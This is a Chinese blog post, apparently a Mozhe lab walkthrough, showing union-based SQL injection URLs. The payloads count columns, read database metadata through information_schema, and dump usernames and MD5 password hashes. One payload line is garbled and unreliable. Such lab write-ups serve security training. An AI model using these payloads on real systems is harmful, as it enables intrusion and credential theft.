墨者sql注入漏洞测试习

墨者sql注入漏洞测试习

判断注入

猜解列名数量(字段数) : order by 这里就是在网站末尾加上order by1,网站正常在order by2,网站正常在order by3,以此类推知道网站不正常就知道有多少个字段数,最好网站不正常的那个数字前一个数字就是字段数。

猜解准备

213.15349 221 48354/mew lst php?id= -1 and 2=2222 union select 1.2.3.4,,目的是让网站报错看看能下出来的数字是几,就在几哪里修改成我们想要的语法,只有让他显示出来外面才能知道。

 报错的显示出来的是2.3。

信息收集,下面这些是数据库语,数据库规定的

数据库版本:version()    5.7.22-0ubuntu0.16.04.1

数据库名字:database()  mozhe_Discuz_StormGroup

数据库用户:user()   root@localhost

操作系统:@@version_compile_os    linux

 通过,这个手段来获取我们上面所需要收集的信息。由于版本是5.7高于5.0是高版本就可以使用informationschema有据查询,

查询到了这个网站的表

也可以写为http://219.153.49.228:43123/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’ 搜搜的结果是一样的。
原文链接:https://blog.csdn.net/RichUee/article/details/128172756where是条件的意思,这句语法的意思要查询nformation_schema.tables中表名是table_name的信息条件是数据库名是mozhe。。。;结果查询到表名在查询列名

 http://219.153.49.228:43123/new_list.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name=‘StormGroup_member’。

语法跟上面的意思差不多,只不过查询的column_name

结果

 

 知道列名的信息就可以查询指定列的信息了

http://219.153.49.228:43123/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member 

 下面出现的那串md5加密的的root密码。加解密一下就可以获得密码。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值